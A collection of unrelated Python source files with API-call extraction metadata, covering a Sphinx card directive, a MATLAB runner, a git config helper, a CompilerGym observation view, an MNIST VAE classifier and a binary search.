card_classes += [f"sd-shadow-{options.get('shadow', 'sm')}"]
if "link" in options:
card_classes += ["sd-card-hover"]
card = create_component(
"card",
card_classes
+ options.get("text-align", [])
+ options.get("class-card", []),
)
inst.set_source_info(card)
container = card
if "img-background" in options:
card.append(
nodes.image(
uri=options["img-background"],
classes=["sd-card-img"],
alt="background image",
)
)
overlay = create_component("card-overlay", ["sd-card-img-overlay"])
inst.set_source_info(overlay)
card += overlay
container = overlay
if "img-top" in options:
image_top = nodes.image(
"",
uri=options["img-top"],
alt="card-img-top",
classes=["sd-card-img-top"],
)
container.append(image_top)
components = cls.split_content(inst.content, inst.content_offset)
if components.header:
container.append(
cls._create_component(
inst, "header", options, components.header[0], components.header[1]
)
)
body = cls._create_component(
inst, "body", options, components.body[0], components.body[1]
)
if arguments:
title = create_component(
"card-title",
["sd-card-title", "sd-font-weight-bold"]
+ options.get("class-title", []),
)
textnodes, _ = inst.state.inline_text(arguments[0], inst.lineno)
title.extend(textnodes)
body.insert(0, title)
container.append(body)
if components.footer:
container.append(
cls._create_component(
inst, "footer", options, components.footer[0], components.footer[1]
)
)
if "img-bottom" in options:
image_bottom = nodes.image(
"",
uri=options["img-bottom"],
alt="card-img-bottom",
classes=["sd-card-img-bottom"],
)
container.append(image_bottom)
if "link" in options:
link_container = PassthroughTextElement()
if options.get("link-type", "url") == "url":
link = nodes.reference(
"",
"",
refuri=options["link"],
classes=["sd-stretched-link"],
)
else:
options = {
# TODO the presence of classes raises an error if the link cannot be found
"classes": ["sd-stretched-link"],
"reftarget": options["link"],
"refdoc": inst.env.docname,
"refdomain": "" if options["link-type"] == "any" else "std",
"reftype": options["link-type"],
"refexplicit": True,
"refwarn": True,
}
link = addnodes.pending_xref("", nodes.Text(""), **options)
inst.set_source_info(link)
link_container += link
container.append(link_container)
return card
@staticmethod
def split_content(content: StringList, offset: int) -> CardContent:
"""Split the content into header, body and footer."""
header_index, footer_index, header, footer = None, None, None, None
body_offset = offset
for index, line in enumerate(content):
# match the first occurrence of a header regex
if (header_index is None) and REGEX_HEADER.match(line):
header_index = index
# match the final occurrence of a footer regex
if REGEX_FOOTER.match(line):
footer_index = index
if header_index is not None:
header = (offset, content[:header_index])
body_offset += header_index + 1
if footer_index is not None:
footer = (offset + footer_index + 1, content[footer_index + 1 :])
body = (
body_offset,
content[
(header_index + 1 if header_index is not None else None) : footer_index
],
)
return CardContent(body, header, footer)
@classmethod
def _create_component(
cls,
inst: SphinxDirective,
name: str,
options: dict,
offset: int,
content: StringList,
) -> nodes.container:
"""Create the header, body, or footer."""
component = create_component(
f"card-{name}", [f"sd-card-{name}"] + options.get(f"class-{name}", [])
)
inst.set_source_info(component) # TODO set proper lines
inst.state.nested_parse(content, offset, component)
cls.add_card_child_classes(component)
return component
@staticmethod
def add_card_child_classes(node):
"""Add classes to specific child nodes."""
for para in node.traverse(nodes.paragraph):
para["classes"] = ([] if "classes" not in para else para["classes"]) + [
"sd-card-text"
]
# for title in node.traverse(nodes.title):
# title["classes"] = ([] if "classes" not in title else title["classes"]) + [
# "sd-card-title"
# ]
class CardCarouselDirective(SphinxDirective):
"""A component, which is a container for cards in a single scrollable row."""
has_content = True
required_arguments = 1 # columns
optional_arguments = 0
option_spec = {
"class": directives.class_option,
}
def run(self) -> List[nodes.Node]:
"""Run the directive."""
self.assert_has_content()
try:
cols = make_choice([str(i) for i in range(1, 13)])(
self.arguments[0].strip()
)
except ValueError as exc:
raise self.error(f"Invalid directive argument: {exc}")
container = create_component(
"card-carousel",
["sd-sphinx-override", "sd-cards-carousel", f"sd-card-cols-{cols}"]
+ self.options.get("class", []),
)
self.set_source_info(container)
self.state.nested_parse(self.content, self.content_offset, container)
for item in container.children:
if not is_component(item, "card"):
LOGGER.warning(
"All children of a 'card-carousel' "
f"should be 'card' [{WARNING_TYPE}.card]",
location=item,
type=WARNING_TYPE,
subtype="card",
)
break
return [container]
|
[
"sphinx.util.logging.getLogger",
"docutils.nodes.reference",
"docutils.nodes.Text",
"docutils.nodes.image",
"re.compile"
] |
[((510, 529), 'sphinx.util.logging.getLogger', 'getLogger', (['__name__'], {}), '(__name__)\n', (519, 529), False, 'from sphinx.util.logging import getLogger\n'), ((617, 644), 're.compile', 're.compile', (['"""^\\\\^{3,}\\\\s*$"""'], {}), "('^\\\\^{3,}\\\\s*$')\n", (627, 644), False, 'import re\n'), ((659, 686), 're.compile', 're.compile', (['"""^\\\\+{3,}\\\\s*$"""'], {}), "('^\\\\+{3,}\\\\s*$')\n", (669, 686), False, 'import re\n'), ((3458, 3551), 'docutils.nodes.image', 'nodes.image', (['""""""'], {'uri': "options['img-top']", 'alt': '"""card-img-top"""', 'classes': "['sd-card-img-top']"}), "('', uri=options['img-top'], alt='card-img-top', classes=[\n 'sd-card-img-top'])\n", (3469, 3551), False, 'from docutils import nodes\n'), ((4757, 4859), 'docutils.nodes.image', 'nodes.image', (['""""""'], {'uri': "options['img-bottom']", 'alt': '"""card-img-bottom"""', 'classes': "['sd-card-img-bottom']"}), "('', uri=options['img-bottom'], alt='card-img-bottom', classes=[\n 'sd-card-img-bottom'])\n", (4768, 4859), False, 'from docutils import nodes\n'), ((3033, 3129), 'docutils.nodes.image', 'nodes.image', ([], {'uri': "options['img-background']", 'classes': "['sd-card-img']", 'alt': '"""background image"""'}), "(uri=options['img-background'], classes=['sd-card-img'], alt=\n 'background image')\n", (3044, 3129), False, 'from docutils import nodes\n'), ((5142, 5220), 'docutils.nodes.reference', 'nodes.reference', (['""""""', '""""""'], {'refuri': "options['link']", 'classes': "['sd-stretched-link']"}), "('', '', refuri=options['link'], classes=['sd-stretched-link'])\n", (5157, 5220), False, 'from docutils import nodes\n'), ((5892, 5906), 'docutils.nodes.Text', 'nodes.Text', (['""""""'], {}), "('')\n", (5902, 5906), False, 'from docutils import nodes\n')]
|
import os
from resqueue import utils
class Matlab(object):
""" very preliminary, initial matlab class
to support matlab computing
"""
def __init__(self, matfile, cmd=None):
self.matfile = matfile
self.cmd = cmd
def _file_exists(self):
if not os.path.isfile(self.matfile):
raise Exception("file cannot be found: matfile")
def _add_prefix_suffix(self):
""" method reads in the matlab script and makes it
a function so that it can be called via the malab
terminal command
"""
with open(self.matfile, 'r') as mfile:
matfile = mfile.read()
self.prefix = "function[proxy]=resmat()\n"
self.suffix = "\nend\n"
self.mat_text = self.prefix + matfile + self.suffix
new_path = os.path.join(os.path.dirname(self.matfile), "resmat.m")
with open(new_path, 'w') as mfile:
mfile.write(self.mat_text)
self.edited_matfile = new_path
def _mlabcmd(self):
if self.cmd is None:
self.cmd = "matlab -nodesktop -nojvm -nodisplay -r"
self.cmd = self.cmd + " resmat();quit"
def run(self):
self._file_exists()
self._add_prefix_suffix()
self._mlabcmd()
if os.getcwd() != os.path.dirname(self.edited_matfile):
os.chdir(os.path.dirname(self.edited_matfile))
return utils.shell(self.cmd.split())
|
[
"os.getcwd",
"os.path.isfile",
"os.path.dirname"
] |
[((293, 321), 'os.path.isfile', 'os.path.isfile', (['self.matfile'], {}), '(self.matfile)\n', (307, 321), False, 'import os\n'), ((830, 859), 'os.path.dirname', 'os.path.dirname', (['self.matfile'], {}), '(self.matfile)\n', (845, 859), False, 'import os\n'), ((1280, 1291), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1289, 1291), False, 'import os\n'), ((1295, 1331), 'os.path.dirname', 'os.path.dirname', (['self.edited_matfile'], {}), '(self.edited_matfile)\n', (1310, 1331), False, 'import os\n'), ((1354, 1390), 'os.path.dirname', 'os.path.dirname', (['self.edited_matfile'], {}), '(self.edited_matfile)\n', (1369, 1390), False, 'import os\n')]
|
# Copyright (c) 2021 <NAME> <<EMAIL>>
# This file is part of the "cgitize" project.
# For details, see https://github.com/egor-tensin/cgitize.
# Distributed under the MIT License.
from contextlib import contextmanager
import os
from cgitize import utils
GIT_ENV = os.environ.copy()
GIT_ENV['GIT_SSH_COMMAND'] = 'ssh -oBatchMode=yes -oLogLevel=QUIET -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null'
class Config:
def __init__(self, path):
self.path = path
def exists(self):
return os.path.exists(self.path)
def open(self, mode='r'):
return open(self.path, mode=mode, encoding='utf-8')
def read(self):
with self.open(mode='r') as fd:
return fd.read()
def write(self, contents):
with self.open(mode='w') as fd:
fd.write(contents)
@contextmanager
def backup(self):
old_contents = self.read()
try:
yield old_contents
finally:
self.write(old_contents)
    # What follows is an extremely loose interpretation of what the .gitconfig
# syntax is. The source was git-config(1).
class Section:
def __init__(self, name, variables):
Config.Section.validate_name(name)
self.name = name
self.variables = variables
@staticmethod
def validate_name(name):
if not name:
raise RuntimeError('section names cannot be empty')
for c in name:
if c.isalnum() or c == '-' or c == '.':
continue
raise RuntimeError(f'section names must only contain alphanumeric characters, . or -: {name}')
@staticmethod
def format_name(name):
return name
def format(self):
result = f'[{self.format_name(self.name)}]\n'
result += ''.join((var.format() for var in self.variables))
return result
class Subsection:
def __init__(self, section, name, variables):
Config.Section.validate_name(section)
Config.Subsection.validate_name(name)
self.section = section
self.name = name
self.variables = variables
@staticmethod
def validate_name(name):
if '\n' in name:
raise RuntimeError(f'subsection names cannot contain newlines: {name}')
def format_name(self):
name = self.name
# Escape the backslashes:
name = name.replace('\\', '\\\\')
# Escape the quotes:
name = name.replace('"', '\\"')
# Put in quotes:
return f'"{name}"'
def format(self):
result = f'[{Config.Section.format_name(self.section)} {self.format_name()}]\n'
result += ''.join((var.format() for var in self.variables))
return result
class Variable:
def __init__(self, name, value):
Config.Variable.validate_name(name)
Config.Variable.validate_value(value)
self.name = name
self.value = value
@staticmethod
def validate_name(name):
if not name:
raise RuntimeError('variable names cannot be empty')
for c in name:
if c.isalnum() or c == '-':
continue
raise RuntimeError(f'variable name can only contain alphanumeric characters or -: {name}')
if not name[0].isalnum():
raise RuntimeError(f'variable name must start with an alphanumeric character: {name}')
@staticmethod
def validate_value(value):
pass
def format_name(self):
return self.name
def format_value(self):
value = self.value
# Escape the backslashes:
value = value.replace('\\', '\\\\')
# Escape the supported escape sequences (\n, \t and \b):
value = value.replace('\n', '\\n')
value = value.replace('\t', '\\t')
value = value.replace('\b', '\\b')
# Escape the quotes:
value = value.replace('"', '\\"')
# Put in quotes:
value = f'"{value}"'
return value
def format(self):
return f' {self.format_name()} = {self.format_value()}\n'
class Git:
EXE = 'git'
@staticmethod
def check(*args, **kwargs):
return utils.try_run(Git.EXE, *args, env=GIT_ENV, **kwargs)
@staticmethod
def capture(*args, **kwargs):
return utils.try_run_capture(Git.EXE, *args, env=GIT_ENV, **kwargs)
@staticmethod
def get_global_config():
return Config(os.path.expanduser('~/.gitconfig'))
@staticmethod
@contextmanager
def setup_auth(repo):
if not repo.url_auth:
yield
return
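        # Temporarily add an insteadOf rewrite pointing at the authenticated URL; backup() restores the original config on exit.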
config = Git.get_global_config()
with utils.protected_file(config.path):
with config.backup() as old_contents:
variables = [Config.Variable('insteadOf', repo.clone_url)]
subsection = Config.Subsection('url', repo.clone_url_with_auth, variables)
new_contents = f'{old_contents}\n{subsection.format()}'
config.write(new_contents)
yield
|
[
"cgitize.utils.try_run",
"cgitize.utils.protected_file",
"os.environ.copy",
"cgitize.utils.try_run_capture",
"os.path.exists",
"os.path.expanduser"
] |
[((268, 285), 'os.environ.copy', 'os.environ.copy', ([], {}), '()\n', (283, 285), False, 'import os\n'), ((521, 546), 'os.path.exists', 'os.path.exists', (['self.path'], {}), '(self.path)\n', (535, 546), False, 'import os\n'), ((4475, 4527), 'cgitize.utils.try_run', 'utils.try_run', (['Git.EXE', '*args'], {'env': 'GIT_ENV'}), '(Git.EXE, *args, env=GIT_ENV, **kwargs)\n', (4488, 4527), False, 'from cgitize import utils\n'), ((4596, 4656), 'cgitize.utils.try_run_capture', 'utils.try_run_capture', (['Git.EXE', '*args'], {'env': 'GIT_ENV'}), '(Git.EXE, *args, env=GIT_ENV, **kwargs)\n', (4617, 4656), False, 'from cgitize import utils\n'), ((4727, 4761), 'os.path.expanduser', 'os.path.expanduser', (['"""~/.gitconfig"""'], {}), "('~/.gitconfig')\n", (4745, 4761), False, 'import os\n'), ((4949, 4982), 'cgitize.utils.protected_file', 'utils.protected_file', (['config.path'], {}), '(config.path)\n', (4969, 4982), False, 'from cgitize import utils\n')]
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from typing import Callable, Dict, List
from gym.spaces import Space
from compiler_gym.service import observation2py, observation_t
from compiler_gym.service.proto import Observation, ObservationRequest, ObservationSpace
from compiler_gym.views.observation_space_spec import ObservationSpaceSpec
class ObservationView(object):
"""A view into the available observation spaces of a service.
Example usage:
>>> env = gym.make("llvm-v0")
>>> env.reset()
>>> env.observation.spaces.keys()
["Autophase", "Ir"]
>>> env.observation.spaces["Autophase"].space
Box(56,)
>>> env.observation["Autophase"]
[0, 1, ..., 2]
>>> observation["Ir"]
int main() {...}
"""
def __init__(
self,
get_observation: Callable[[ObservationRequest], Observation],
spaces: List[ObservationSpace],
):
if not spaces:
raise ValueError("No observation spaces")
self.spaces = {
s.name: ObservationSpaceSpec.from_proto(i, s) for i, s in enumerate(spaces)
}
self.session_id = -1
self._get_observation = get_observation
self._base_spaces: Dict[str, Space] = {}
self._translate_cbs: Dict[str, Callable[[observation_t], observation_t]] = {}
def __getitem__(self, observation_space: str) -> observation_t:
"""Request an observation from the given space.
:param observation_space: The observation space to query.
:return: An observation.
:raises KeyError: If the requested observation space does not exist.
"""
request = ObservationRequest(
session_id=self.session_id,
observation_space=self.spaces[observation_space].index,
)
return self.translate(
observation_space,
observation2py(
self._base_spaces.get(
observation_space, self.spaces[observation_space].space
),
self._get_observation(request),
),
)
# TODO(cummins): Register an opaque_data_format handler that replaces the
# "Space" and updates observation2py / observation2str.
def register_derived_space(
self,
base_name: str,
derived_name: str,
derived_space: Space,
cb: Callable[[observation_t], observation_t],
) -> None:
"""Add a hook for implementing derived observation spaces.
Subclasses of ObservationView call this method in their
:code:`__init__()` after initializing the base class to register new
observation spaces that are derived from those provided by the
CompilerService.
Example usage:
Suppose we have a service that provides a "src" observation space
that returns a string of source code. We want to create a new
observation space, "src_len", that returns the length of the source
code. We do this by calling :code:`register_derived_space()` and
providing the a callback to translate from the base observation space
to the derived value:
.. code-block:: python
class MyObservationView(ObservationView):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.register_derived_space(
derived_name="src_len",
base_name="src",
derived_space=Box(low=0, high=float("inf"), shape=(1,), dtype=int),
derive=lambda src: [len(src)],
)
Now we can request for "src_len" observation space and receive
observations from this new derived space.
>>> env.observation["src_len"]
[1021,]
:param base_name: The name of the observation space that this new
observation space is derived from.
:param derived_name: The name of the derived observation space
"""
base_spec = self.spaces[base_name]
spec = ObservationSpaceSpec(id=derived_name, space=derived_space)
spec.index = base_spec.index
spec.deterministic = base_spec.deterministic
spec.platform_dependent = base_spec.platform_dependent
self.spaces[derived_name] = spec
self._translate_cbs[derived_name] = cb
def __repr__(self):
return f"ObservationView[{', '.join(sorted(self.spaces.keys()))}]"
def translate(
self, observation_space: str, observation: observation_t
) -> observation_t:
"""Translate an observation according to the space.
        This method translates the value returned by a CompilerService according
to any derived observation spaces, as registered using
register_derived_space(). If the requested observation space is not
derived the observation is returned unmodified.
:param observation_space: The name of the observation space.
:param observation: An observation returned by a CompilerService.
:return: An observation, after applying any derived space translations.
"""
return self._translate_cbs.get(observation_space, lambda x: x)(observation)
|
[
"compiler_gym.service.proto.ObservationRequest",
"compiler_gym.views.observation_space_spec.ObservationSpaceSpec.from_proto",
"compiler_gym.views.observation_space_spec.ObservationSpaceSpec"
] |
[((1779, 1886), 'compiler_gym.service.proto.ObservationRequest', 'ObservationRequest', ([], {'session_id': 'self.session_id', 'observation_space': 'self.spaces[observation_space].index'}), '(session_id=self.session_id, observation_space=self.\n spaces[observation_space].index)\n', (1797, 1886), False, 'from compiler_gym.service.proto import Observation, ObservationRequest, ObservationSpace\n'), ((4223, 4281), 'compiler_gym.views.observation_space_spec.ObservationSpaceSpec', 'ObservationSpaceSpec', ([], {'id': 'derived_name', 'space': 'derived_space'}), '(id=derived_name, space=derived_space)\n', (4243, 4281), False, 'from compiler_gym.views.observation_space_spec import ObservationSpaceSpec\n'), ((1156, 1193), 'compiler_gym.views.observation_space_spec.ObservationSpaceSpec.from_proto', 'ObservationSpaceSpec.from_proto', (['i', 's'], {}), '(i, s)\n', (1187, 1193), False, 'from compiler_gym.views.observation_space_spec import ObservationSpaceSpec\n')]
|
import torch
from torch.autograd import Variable
import torch.nn as nn
from torchvision import datasets, transforms
from torch.utils.data import DataLoader
import torch.optim as optim
import math
import numpy as np
import os
import torch.nn.functional as F
import torch.nn.init as init
import matplotlib.pyplot as plt
import seaborn as sns
import warnings
warnings.filterwarnings('ignore')
class Classification(nn.Module):
def __init__(self, z_dim=2):
super(Classification, self).__init__()
self.z_dim = z_dim
self.net = nn.Sequential(
nn.Linear(z_dim, 10),
nn.ReLU(True),
nn.Linear(10, 10),
)
self.weight_init()
def weight_init(self, mode='normal'):
initializer = normal_init
for block in self._modules:
for m in self._modules[block]:
initializer(m)
def forward(self, z):
return self.net(z).squeeze()
class CNNVAE1(nn.Module):
def __init__(self, z_dim=2):
super(CNNVAE1, self).__init__()
self.z_dim = z_dim
self.encode = nn.Sequential(
nn.Conv2d(1, 28, 4, 2, 1),
nn.ReLU(True),
nn.Conv2d(28, 28, 4, 2, 1),
nn.ReLU(True),
nn.Conv2d(28, 56, 4, 2, 1),
nn.ReLU(True),
nn.Conv2d(56, 118, 4, 2, 1),
nn.ReLU(True),
nn.Conv2d(118, 2 * z_dim, 1),
)
self.decode = nn.Sequential(
nn.Conv2d(z_dim, 118, 1),
nn.ReLU(True),
nn.ConvTranspose2d(118, 118, 4, 2, 1),
nn.ReLU(True),
nn.ConvTranspose2d(118, 56, 4, 2, 1),
nn.ReLU(True),
nn.ConvTranspose2d(56, 28, 4, 1),
nn.ReLU(True),
nn.ConvTranspose2d(28, 28, 4, 2, 1),
nn.ReLU(True),
nn.ConvTranspose2d(28, 1, 4, 2, 1),
nn.Sigmoid(),
)
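    # Reparameterization trick: with eps ~ N(0, I), z = mu + std * eps keeps
    # sampling differentiable w.r.t. mu and logvar.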
def reparametrize(self, mu, logvar):
std = logvar.mul(0.5).exp_()
eps = std.data.new(std.size()).normal_()
return eps.mul(std).add_(mu)
def forward(self, x, no_dec=False, no_enc=False):
if no_enc:
            # sample 49 latent codes; decode() expects (N, z_dim, 1, 1) inputs
            gen_z = Variable(torch.randn(49, self.z_dim, 1, 1), requires_grad=False)
gen_z = gen_z.to(device)
return self.decode(gen_z).view(x.size())
if no_dec:
stats = self.encode(x)
mu = stats[:, :self.z_dim]
logvar = stats[:, self.z_dim:]
z = self.reparametrize(mu, logvar)
return z.squeeze()
else:
            stats = self.encode(x)  # the conv encoder expects (N, 1, 28, 28), not flattened vectors
mu = stats[:, :self.z_dim]
logvar = stats[:, self.z_dim:]
z = self.reparametrize(mu, logvar)
x_recon = self.decode(z).view(x.size())
return x_recon, mu, logvar, z.squeeze()
def normal_init(m):
if isinstance(m, (nn.Linear, nn.Conv2d)):
init.normal(m.weight, 0, 0.02)
if m.bias is not None:
m.bias.data.fill_(0)
elif isinstance(m, (nn.BatchNorm1d, nn.BatchNorm2d)):
m.weight.data.fill_(1)
if m.bias is not None:
m.bias.data.fill_(0)
def recon_loss(x_recon, x):
n = x.size(0)
loss = F.binary_cross_entropy(x_recon, x, size_average=False).div(n)
return loss
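# Closed-form KL divergence between N(mu, diag(sigma^2)) and N(0, I):
#   KL = -1/2 * sum(1 + log(sigma^2) - mu^2 - sigma^2), averaged over the batch.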
def kl_divergence(mu, logvar):
kld = -0.5 * (1 + logvar - mu ** 2 - logvar.exp()).sum(1).mean()
return kld
use_cuda = torch.cuda.is_available()
device = 'cuda' if use_cuda else 'cpu'
print('This code is running on', device)
max_iter = 20
batch_size = 100
z_dim = 2
lr_C = 0.001
beta1_C = 0.9
beta2_C = 0.999
training_set = datasets.MNIST('./tmp/MNIST', train=True, download=True, transform=transforms.ToTensor())
test_set = datasets.MNIST('./tmp/MNIST', train=False, download=True, transform=transforms.ToTensor())
data_loader = DataLoader(training_set, batch_size=batch_size, shuffle=True)
test_loader = DataLoader(test_set, batch_size=10000, shuffle=True, num_workers=3)
VAE = CNNVAE1().to(device)
VAE.load_state_dict(torch.load('./Info_VAE_CNN'))
C = Classification().to(device)
optim_C = optim.Adam(C.parameters(), lr=0.005, betas=(beta1_C, beta2_C))
criterion = nn.CrossEntropyLoss()
print('Network is loaded')
Result = []
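# Train only the classifier C on the pretrained VAE's latent codes z;
# the optimizer holds C's parameters, so the VAE weights are not updated.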
for epoch in range(max_iter):
train_loss = 0
for batch_idx, (x_true, target) in enumerate(data_loader):
x_true, target = x_true.to(device), target.to(device)
z = VAE(x_true, no_dec=True)
outputs = C(z)
loss = criterion(outputs, target)
optim_C.zero_grad()
loss.backward()
optim_C.step()
train_loss += loss.item()
if batch_idx % 100 == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)] \t Loss: {:.6f} '.format(epoch, batch_idx * len(x_true),
len(data_loader.dataset),
100. * batch_idx / len(data_loader),
loss.item(),
))
print('====> Epoch: {}, \t Average loss: {:.4f}'
.format(epoch, train_loss / (batch_idx + 1)))
Result.append(('====>epoch:', epoch,
'loss:', train_loss / (batch_idx + 1),
))
    (x_test, labels) = next(iter(test_loader))  # Python 3: next(it), not it.next()
    x_test, labels = x_test.to(device), labels.to(device)
    z = VAE(x_test, no_dec=True)  # x_test is already on `device`
outputs = C(z)
_, predicted = torch.max(outputs.data, 1)
Accuracy = (predicted == labels).sum().item()/x_test.size(0)
Result.append(Accuracy)
with open("InfoAccuracyCNN.txt", "w") as output:
output.write(str(Result))
|
[
"torch.nn.functional.binary_cross_entropy",
"torch.nn.ReLU",
"torch.nn.ConvTranspose2d",
"torch.utils.data.DataLoader",
"warnings.filterwarnings",
"torch.load",
"torch.nn.Conv2d",
"torch.nn.CrossEntropyLoss",
"torch.randn",
"torch.nn.Sigmoid",
"torch.nn.init.normal",
"torch.max",
"torch.cuda.is_available",
"torch.nn.Linear",
"torchvision.transforms.ToTensor"
] |
[((360, 393), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""ignore"""'], {}), "('ignore')\n", (383, 393), False, 'import warnings\n'), ((3431, 3456), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (3454, 3456), False, 'import torch\n'), ((3862, 3923), 'torch.utils.data.DataLoader', 'DataLoader', (['training_set'], {'batch_size': 'batch_size', 'shuffle': '(True)'}), '(training_set, batch_size=batch_size, shuffle=True)\n', (3872, 3923), False, 'from torch.utils.data import DataLoader\n'), ((3938, 4005), 'torch.utils.data.DataLoader', 'DataLoader', (['test_set'], {'batch_size': '(10000)', 'shuffle': '(True)', 'num_workers': '(3)'}), '(test_set, batch_size=10000, shuffle=True, num_workers=3)\n', (3948, 4005), False, 'from torch.utils.data import DataLoader\n'), ((4204, 4225), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ([], {}), '()\n', (4223, 4225), True, 'import torch.nn as nn\n'), ((5613, 5639), 'torch.max', 'torch.max', (['outputs.data', '(1)'], {}), '(outputs.data, 1)\n', (5622, 5639), False, 'import torch\n'), ((4055, 4083), 'torch.load', 'torch.load', (['"""./Info_VAE_CNN"""'], {}), "('./Info_VAE_CNN')\n", (4065, 4083), False, 'import torch\n'), ((2917, 2947), 'torch.nn.init.normal', 'init.normal', (['m.weight', '(0)', '(0.02)'], {}), '(m.weight, 0, 0.02)\n', (2928, 2947), True, 'import torch.nn.init as init\n'), ((3722, 3743), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (3741, 3743), False, 'from torchvision import datasets, transforms\n'), ((3824, 3845), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (3843, 3845), False, 'from torchvision import datasets, transforms\n'), ((581, 601), 'torch.nn.Linear', 'nn.Linear', (['z_dim', '(10)'], {}), '(z_dim, 10)\n', (590, 601), True, 'import torch.nn as nn\n'), ((615, 628), 'torch.nn.ReLU', 'nn.ReLU', (['(True)'], {}), '(True)\n', (622, 628), True, 'import torch.nn as nn\n'), ((642, 659), 'torch.nn.Linear', 'nn.Linear', (['(10)', '(10)'], {}), '(10, 10)\n', (651, 659), True, 'import torch.nn as nn\n'), ((1129, 1154), 'torch.nn.Conv2d', 'nn.Conv2d', (['(1)', '(28)', '(4)', '(2)', '(1)'], {}), '(1, 28, 4, 2, 1)\n', (1138, 1154), True, 'import torch.nn as nn\n'), ((1168, 1181), 'torch.nn.ReLU', 'nn.ReLU', (['(True)'], {}), '(True)\n', (1175, 1181), True, 'import torch.nn as nn\n'), ((1195, 1221), 'torch.nn.Conv2d', 'nn.Conv2d', (['(28)', '(28)', '(4)', '(2)', '(1)'], {}), '(28, 28, 4, 2, 1)\n', (1204, 1221), True, 'import torch.nn as nn\n'), ((1235, 1248), 'torch.nn.ReLU', 'nn.ReLU', (['(True)'], {}), '(True)\n', (1242, 1248), True, 'import torch.nn as nn\n'), ((1262, 1288), 'torch.nn.Conv2d', 'nn.Conv2d', (['(28)', '(56)', '(4)', '(2)', '(1)'], {}), '(28, 56, 4, 2, 1)\n', (1271, 1288), True, 'import torch.nn as nn\n'), ((1302, 1315), 'torch.nn.ReLU', 'nn.ReLU', (['(True)'], {}), '(True)\n', (1309, 1315), True, 'import torch.nn as nn\n'), ((1329, 1356), 'torch.nn.Conv2d', 'nn.Conv2d', (['(56)', '(118)', '(4)', '(2)', '(1)'], {}), '(56, 118, 4, 2, 1)\n', (1338, 1356), True, 'import torch.nn as nn\n'), ((1370, 1383), 'torch.nn.ReLU', 'nn.ReLU', (['(True)'], {}), '(True)\n', (1377, 1383), True, 'import torch.nn as nn\n'), ((1397, 1425), 'torch.nn.Conv2d', 'nn.Conv2d', (['(118)', '(2 * z_dim)', '(1)'], {}), '(118, 2 * z_dim, 1)\n', (1406, 1425), True, 'import torch.nn as nn\n'), ((1486, 1510), 'torch.nn.Conv2d', 'nn.Conv2d', (['z_dim', '(118)', '(1)'], {}), '(z_dim, 118, 1)\n', (1495, 1510), True, 'import torch.nn as nn\n'), ((1524, 1537), 
'torch.nn.ReLU', 'nn.ReLU', (['(True)'], {}), '(True)\n', (1531, 1537), True, 'import torch.nn as nn\n'), ((1551, 1588), 'torch.nn.ConvTranspose2d', 'nn.ConvTranspose2d', (['(118)', '(118)', '(4)', '(2)', '(1)'], {}), '(118, 118, 4, 2, 1)\n', (1569, 1588), True, 'import torch.nn as nn\n'), ((1602, 1615), 'torch.nn.ReLU', 'nn.ReLU', (['(True)'], {}), '(True)\n', (1609, 1615), True, 'import torch.nn as nn\n'), ((1629, 1665), 'torch.nn.ConvTranspose2d', 'nn.ConvTranspose2d', (['(118)', '(56)', '(4)', '(2)', '(1)'], {}), '(118, 56, 4, 2, 1)\n', (1647, 1665), True, 'import torch.nn as nn\n'), ((1679, 1692), 'torch.nn.ReLU', 'nn.ReLU', (['(True)'], {}), '(True)\n', (1686, 1692), True, 'import torch.nn as nn\n'), ((1706, 1738), 'torch.nn.ConvTranspose2d', 'nn.ConvTranspose2d', (['(56)', '(28)', '(4)', '(1)'], {}), '(56, 28, 4, 1)\n', (1724, 1738), True, 'import torch.nn as nn\n'), ((1752, 1765), 'torch.nn.ReLU', 'nn.ReLU', (['(True)'], {}), '(True)\n', (1759, 1765), True, 'import torch.nn as nn\n'), ((1779, 1814), 'torch.nn.ConvTranspose2d', 'nn.ConvTranspose2d', (['(28)', '(28)', '(4)', '(2)', '(1)'], {}), '(28, 28, 4, 2, 1)\n', (1797, 1814), True, 'import torch.nn as nn\n'), ((1828, 1841), 'torch.nn.ReLU', 'nn.ReLU', (['(True)'], {}), '(True)\n', (1835, 1841), True, 'import torch.nn as nn\n'), ((1855, 1889), 'torch.nn.ConvTranspose2d', 'nn.ConvTranspose2d', (['(28)', '(1)', '(4)', '(2)', '(1)'], {}), '(28, 1, 4, 2, 1)\n', (1873, 1889), True, 'import torch.nn as nn\n'), ((1903, 1915), 'torch.nn.Sigmoid', 'nn.Sigmoid', ([], {}), '()\n', (1913, 1915), True, 'import torch.nn as nn\n'), ((3223, 3277), 'torch.nn.functional.binary_cross_entropy', 'F.binary_cross_entropy', (['x_recon', 'x'], {'size_average': '(False)'}), '(x_recon, x, size_average=False)\n', (3245, 3277), True, 'import torch.nn.functional as F\n'), ((2195, 2217), 'torch.randn', 'torch.randn', (['(49)', 'z_dim'], {}), '(49, z_dim)\n', (2206, 2217), False, 'import torch\n')]
|
import math
def binary_search(sortedarray, key):
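    '''Return the index of key in sortedarray, or -1 if key is absent.
    Runs in O(log n) comparisons on a sorted list.'''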
left = 0
right = len(sortedarray) - 1
while left <= right:
mid = math.floor((left + right) / 2)
if key == sortedarray[mid]:
return mid
else:
if key < sortedarray[mid]:
right = mid -1
else:
left = mid + 1
return -1
#x = [49, 50, 50, 50, 900]
#mykey = 50
#print(binary_search(x, mykey))
|
[
"math.floor"
] |
[((211, 241), 'math.floor', 'math.floor', (['((left + right) / 2)'], {}), '((left + right) / 2)\n', (221, 241), False, 'import math\n')]
|
# Copyright (c) 2011 - 2017, Intel Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""``test_reporting_server.py``
